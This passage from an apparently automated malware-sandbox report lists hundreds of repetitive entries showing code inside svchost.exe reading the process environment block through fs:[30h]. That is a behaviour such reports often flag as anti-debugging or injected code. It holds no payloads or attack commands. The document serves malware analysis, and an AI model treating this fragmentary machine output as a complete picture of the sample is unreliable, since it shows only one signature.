                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]2_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]2_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]2_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]2_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]2_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]2_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031D437C mov eax, dword ptr fs:[00000030h]2_2_031D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0320634F mov eax, dword ptr fs:[00000030h]2_2_0320634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03128397 mov eax, dword ptr fs:[00000030h]2_2_03128397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03128397 mov eax, dword ptr fs:[00000030h]2_2_03128397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03128397 mov eax, dword ptr fs:[00000030h]2_2_03128397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312E388 mov eax, dword ptr fs:[00000030h]2_2_0312E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312E388 mov eax, dword ptr fs:[00000030h]2_2_0312E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312E388 mov eax, dword ptr fs:[00000030h]2_2_0312E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315438F mov eax, dword ptr fs:[00000030h]2_2_0315438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315438F mov eax, dword ptr fs:[00000030h]2_2_0315438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DE3DB mov eax, dword ptr fs:[00000030h]2_2_031DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DE3DB mov eax, dword ptr fs:[00000030h]2_2_031DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DE3DB mov ecx, dword ptr fs:[00000030h]2_2_031DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DE3DB mov eax, dword ptr fs:[00000030h]2_2_031DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031D43D4 mov eax, dword ptr fs:[00000030h]2_2_031D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031D43D4 mov eax, dword ptr fs:[00000030h]2_2_031D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031EC3CD mov eax, dword ptr fs:[00000030h]2_2_031EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313A3C0 mov eax, dword ptr fs:[00000030h]2_2_0313A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313A3C0 mov eax, dword ptr fs:[00000030h]2_2_0313A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313A3C0 mov eax, dword ptr fs:[00000030h]2_2_0313A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313A3C0 mov eax, dword ptr fs:[00000030h]2_2_0313A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313A3C0 mov eax, dword ptr fs:[00000030h]2_2_0313A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313A3C0 mov eax, dword ptr fs:[00000030h]2_2_0313A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031383C0 mov eax, dword ptr fs:[00000030h]2_2_031383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031383C0 mov eax, dword ptr fs:[00000030h]2_2_031383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031383C0 mov eax, dword ptr fs:[00000030h]2_2_031383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031383C0 mov eax, dword ptr fs:[00000030h]2_2_031383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314E3F0 mov eax, dword ptr fs:[00000030h]2_2_0314E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314E3F0 mov eax, dword ptr fs:[00000030h]2_2_0314E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314E3F0 mov eax, dword ptr fs:[00000030h]2_2_0314E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031663FF mov eax, dword ptr fs:[00000030h]2_2_031663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031403E9 mov eax, dword ptr fs:[00000030h]2_2_031403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031403E9 mov eax, dword ptr fs:[00000030h]2_2_031403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031403E9 mov eax, dword ptr fs:[00000030h]2_2_031403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031403E9 mov eax, dword ptr fs:[00000030h]2_2_031403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031403E9 mov eax, dword ptr fs:[00000030h]2_2_031403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031403E9 mov eax, dword ptr fs:[00000030h]2_2_031403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031403E9 mov eax, dword ptr fs:[00000030h]2_2_031403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031403E9 mov eax, dword ptr fs:[00000030h]2_2_031403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312823B mov eax, dword ptr fs:[00000030h]2_2_0312823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312A250 mov eax, dword ptr fs:[00000030h]2_2_0312A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03136259 mov eax, dword ptr fs:[00000030h]2_2_03136259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031EA250 mov eax, dword ptr fs:[00000030h]2_2_031EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031EA250 mov eax, dword ptr fs:[00000030h]2_2_031EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B8243 mov eax, dword ptr fs:[00000030h]2_2_031B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B8243 mov ecx, dword ptr fs:[00000030h]2_2_031B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]2_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]2_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]2_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]2_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]2_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]2_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]2_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]2_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]2_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]2_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]2_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E0274 mov eax, dword ptr fs:[00000030h]2_2_031E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03134260 mov eax, dword ptr fs:[00000030h]2_2_03134260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03134260 mov eax, dword ptr fs:[00000030h]2_2_03134260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03134260 mov eax, dword ptr fs:[00000030h]2_2_03134260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312826B mov eax, dword ptr fs:[00000030h]2_2_0312826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0320625D mov eax, dword ptr fs:[00000030h]2_2_0320625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316E284 mov eax, dword ptr fs:[00000030h]2_2_0316E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316E284 mov eax, dword ptr fs:[00000030h]2_2_0316E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B0283 mov eax, dword ptr fs:[00000030h]2_2_031B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B0283 mov eax, dword ptr fs:[00000030h]2_2_031B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B0283 mov eax, dword ptr fs:[00000030h]2_2_031B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031402A0 mov eax, dword ptr fs:[00000030h]2_2_031402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031402A0 mov eax, dword ptr fs:[00000030h]2_2_031402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C62A0 mov eax, dword ptr fs:[00000030h]2_2_031C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C62A0 mov ecx, dword ptr fs:[00000030h]2_2_031C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C62A0 mov eax, dword ptr fs:[00000030h]2_2_031C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C62A0 mov eax, dword ptr fs:[00000030h]2_2_031C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C62A0 mov eax, dword ptr fs:[00000030h]2_2_031C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C62A0 mov eax, dword ptr fs:[00000030h]2_2_031C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313A2C3 mov eax, dword ptr fs:[00000030h]2_2_0313A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313A2C3 mov eax, dword ptr fs:[00000030h]2_2_0313A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313A2C3 mov eax, dword ptr fs:[00000030h]2_2_0313A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313A2C3 mov eax, dword ptr fs:[00000030h]2_2_0313A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313A2C3 mov eax, dword ptr fs:[00000030h]2_2_0313A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031402E1 mov eax, dword ptr fs:[00000030h]2_2_031402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031402E1 mov eax, dword ptr fs:[00000030h]2_2_031402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031402E1 mov eax, dword ptr fs:[00000030h]2_2_031402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032062D6 mov eax, dword ptr fs:[00000030h]2_2_032062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DA118 mov ecx, dword ptr fs:[00000030h]2_2_031DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DA118 mov eax, dword ptr fs:[00000030h]2_2_031DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DA118 mov eax, dword ptr fs:[00000030h]2_2_031DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DA118 mov eax, dword ptr fs:[00000030h]2_2_031DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F0115 mov eax, dword ptr fs:[00000030h]2_2_031F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DE10E mov eax, dword ptr fs:[00000030h]2_2_031DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DE10E mov ecx, dword ptr fs:[00000030h]2_2_031DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DE10E mov eax, dword ptr fs:[00000030h]2_2_031DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DE10E mov eax, dword ptr fs:[00000030h]2_2_031DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DE10E mov ecx, dword ptr fs:[00000030h]2_2_031DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DE10E mov eax, dword ptr fs:[00000030h]2_2_031DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DE10E mov eax, dword ptr fs:[00000030h]2_2_031DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DE10E mov ecx, dword ptr fs:[00000030h]2_2_031DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DE10E mov eax, dword ptr fs:[00000030h]2_2_031DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DE10E mov ecx, dword ptr fs:[00000030h]2_2_031DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03160124 mov eax, dword ptr fs:[00000030h]2_2_03160124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312C156 mov eax, dword ptr fs:[00000030h]2_2_0312C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C8158 mov eax, dword ptr fs:[00000030h]2_2_031C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03204164 mov eax, dword ptr fs:[00000030h]2_2_03204164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03204164 mov eax, dword ptr fs:[00000030h]2_2_03204164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03136154 mov eax, dword ptr fs:[00000030h]2_2_03136154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03136154 mov eax, dword ptr fs:[00000030h]2_2_03136154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C4144 mov eax, dword ptr fs:[00000030h]2_2_031C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C4144 mov eax, dword ptr fs:[00000030h]2_2_031C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C4144 mov ecx, dword ptr fs:[00000030h]2_2_031C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C4144 mov eax, dword ptr fs:[00000030h]2_2_031C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C4144 mov eax, dword ptr fs:[00000030h]2_2_031C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B019F mov eax, dword ptr fs:[00000030h]2_2_031B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B019F mov eax, dword ptr fs:[00000030h]2_2_031B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B019F mov eax, dword ptr fs:[00000030h]2_2_031B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B019F mov eax, dword ptr fs:[00000030h]2_2_031B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312A197 mov eax, dword ptr fs:[00000030h]2_2_0312A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312A197 mov eax, dword ptr fs:[00000030h]2_2_0312A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312A197 mov eax, dword ptr fs:[00000030h]2_2_0312A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03170185 mov eax, dword ptr fs:[00000030h]2_2_03170185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031EC188 mov eax, dword ptr fs:[00000030h]2_2_031EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031EC188 mov eax, dword ptr fs:[00000030h]2_2_031EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031D4180 mov eax, dword ptr fs:[00000030h]2_2_031D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031D4180 mov eax, dword ptr fs:[00000030h]2_2_031D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032061E5 mov eax, dword ptr fs:[00000030h]2_2_032061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AE1D0 mov eax, dword ptr fs:[00000030h]2_2_031AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AE1D0 mov eax, dword ptr fs:[00000030h]2_2_031AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_031AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AE1D0 mov eax, dword ptr fs:[00000030h]2_2_031AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AE1D0 mov eax, dword ptr fs:[00000030h]2_2_031AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F61C3 mov eax, dword ptr fs:[00000030h]2_2_031F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F61C3 mov eax, dword ptr fs:[00000030h]2_2_031F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031601F8 mov eax, dword ptr fs:[00000030h]2_2_031601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314E016 mov eax, dword ptr fs:[00000030h]2_2_0314E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314E016 mov eax, dword ptr fs:[00000030h]2_2_0314E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314E016 mov eax, dword ptr fs:[00000030h]2_2_0314E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314E016 mov eax, dword ptr fs:[00000030h]2_2_0314E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B4000 mov ecx, dword ptr fs:[00000030h]2_2_031B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031D2000 mov eax, dword ptr fs:[00000030h]2_2_031D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031D2000 mov eax, dword ptr fs:[00000030h]2_2_031D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031D2000 mov eax, dword ptr fs:[00000030h]2_2_031D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031D2000 mov eax, dword ptr fs:[00000030h]2_2_031D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031D2000 mov eax, dword ptr fs:[00000030h]2_2_031D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031D2000 mov eax, dword ptr fs:[00000030h]2_2_031D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031D2000 mov eax, dword ptr fs:[00000030h]2_2_031D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031D2000 mov eax, dword ptr fs:[00000030h]2_2_031D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C6030 mov eax, dword ptr fs:[00000030h]2_2_031C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312A020 mov eax, dword ptr fs:[00000030h]2_2_0312A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312C020 mov eax, dword ptr fs:[00000030h]2_2_0312C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03132050 mov eax, dword ptr fs:[00000030h]2_2_03132050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B6050 mov eax, dword ptr fs:[00000030h]2_2_031B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315C073 mov eax, dword ptr fs:[00000030h]2_2_0315C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313208A mov eax, dword ptr fs:[00000030h]2_2_0313208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F60B8 mov eax, dword ptr fs:[00000030h]2_2_031F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F60B8 mov ecx, dword ptr fs:[00000030h]2_2_031F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031280A0 mov eax, dword ptr fs:[00000030h]2_2_031280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C80A8 mov eax, dword ptr fs:[00000030h]2_2_031C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B20DE mov eax, dword ptr fs:[00000030h]2_2_031B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312C0F0 mov eax, dword ptr fs:[00000030h]2_2_0312C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031720F0 mov ecx, dword ptr fs:[00000030h]2_2_031720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0312A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031380E9 mov eax, dword ptr fs:[00000030h]2_2_031380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B60E0 mov eax, dword ptr fs:[00000030h]2_2_031B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03130710 mov eax, dword ptr fs:[00000030h]2_2_03130710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03160710 mov eax, dword ptr fs:[00000030h]2_2_03160710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316C700 mov eax, dword ptr fs:[00000030h]2_2_0316C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316273C mov eax, dword ptr fs:[00000030h]2_2_0316273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316273C mov ecx, dword ptr fs:[00000030h]2_2_0316273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316273C mov eax, dword ptr fs:[00000030h]2_2_0316273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AC730 mov eax, dword ptr fs:[00000030h]2_2_031AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316C720 mov eax, dword ptr fs:[00000030h]2_2_0316C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316C720 mov eax, dword ptr fs:[00000030h]2_2_0316C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03130750 mov eax, dword ptr fs:[00000030h]2_2_03130750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031BE75D mov eax, dword ptr fs:[00000030h]2_2_031BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172750 mov eax, dword ptr fs:[00000030h]2_2_03172750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172750 mov eax, dword ptr fs:[00000030h]2_2_03172750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B4755 mov eax, dword ptr fs:[00000030h]2_2_031B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316674D mov esi, dword ptr fs:[00000030h]2_2_0316674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316674D mov eax, dword ptr fs:[00000030h]2_2_0316674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316674D mov eax, dword ptr fs:[00000030h]2_2_0316674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03138770 mov eax, dword ptr fs:[00000030h]2_2_03138770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]2_2_03140770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]2_2_03140770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]2_2_03140770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]2_2_03140770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]2_2_03140770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]2_2_03140770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]2_2_03140770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]2_2_03140770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]2_2_03140770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]2_2_03140770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]2_2_03140770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]2_2_03140770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031D678E mov eax, dword ptr fs:[00000030h]2_2_031D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031307AF mov eax, dword ptr fs:[00000030h]2_2_031307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E47A0 mov eax, dword ptr fs:[00000030h]2_2_031E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313C7C0 mov eax, dword ptr fs:[00000030h]2_2_0313C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B07C3 mov eax, dword ptr fs:[00000030h]2_2_031B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031347FB mov eax, dword ptr fs:[00000030h]2_2_031347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031347FB mov eax, dword ptr fs:[00000030h]2_2_031347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031527ED mov eax, dword ptr fs:[00000030h]2_2_031527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031527ED mov eax, dword ptr fs:[00000030h]2_2_031527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031527ED mov eax, dword ptr fs:[00000030h]2_2_031527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031BE7E1 mov eax, dword ptr fs:[00000030h]2_2_031BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172619 mov eax, dword ptr fs:[00000030h]2_2_03172619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AE609 mov eax, dword ptr fs:[00000030h]2_2_031AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314260B mov eax, dword ptr fs:[00000030h]2_2_0314260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314260B mov eax, dword ptr fs:[00000030h]2_2_0314260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314260B mov eax, dword ptr fs:[00000030h]2_2_0314260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314260B mov eax, dword ptr fs:[00000030h]2_2_0314260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314260B mov eax, dword ptr fs:[00000030h]2_2_0314260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314260B mov eax, dword ptr fs:[00000030h]2_2_0314260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314260B mov eax, dword ptr fs:[00000030h]2_2_0314260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314E627 mov eax, dword ptr fs:[00000030h]2_2_0314E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03166620 mov eax, dword ptr fs:[00000030h]2_2_03166620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03168620 mov eax, dword ptr fs:[00000030h]2_2_03168620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313262C mov eax, dword ptr fs:[00000030h]2_2_0313262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314C640 mov eax, dword ptr fs:[00000030h]2_2_0314C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03162674 mov eax, dword ptr fs:[00000030h]2_2_03162674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F866E mov eax, dword ptr fs:[00000030h]2_2_031F866E
